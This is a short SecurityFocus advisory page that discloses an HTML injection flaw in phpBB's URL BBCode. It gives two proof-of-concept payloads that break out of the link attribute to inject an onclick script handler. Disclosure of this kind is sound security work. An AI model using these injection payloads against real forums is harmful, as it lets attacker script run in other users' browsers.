Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PHPBB URL BBCode HTML Injection Vulnerability

The following proof of concept has been supplied:

[url=http://www.example.com" onclick="alert('Hello')]text[/url]

[url=http://www.example.com" onclick=alert("bug");"]test[/url]







 

Privacy Statement
Copyright 2009, SecurityFocus